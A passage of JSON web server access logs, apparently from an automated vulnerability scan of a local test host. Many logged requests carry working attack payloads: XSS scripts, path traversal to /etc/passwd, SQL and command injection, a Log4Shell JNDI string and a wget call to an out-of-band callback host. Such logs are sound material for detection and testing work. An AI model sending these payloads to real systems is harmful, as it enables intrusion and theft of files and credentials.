"http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\x22><\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v0.1/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/whoami HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET c9v8gc8smpv8b0ng0t00iopgu1n7zawyw.oast.online:80/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.DS_Store HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?phpinfo=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/login/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"{\x22params\x22:\x22w=123\x5C\x22'1234123'\x5C\x22|cat /etc/passwd\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"username=${jndi:ldap://${hostName}.c9v8gc8smpv8b0ng0t00bmiq94uos3brb.oast.online/test}&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /MUP/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"127.0.0.1/MUP", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/project?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /em/console/logon/logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webalizer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"key=';`wget http://c9v8gc8smpv8b0ng0t005mcbgbz6z4qqy.oast.online`;#","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=http://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/oauth2/..;/ccversion/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /feed/rdf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/user/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/database.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forums/search/z--%3E%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /check_mk/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 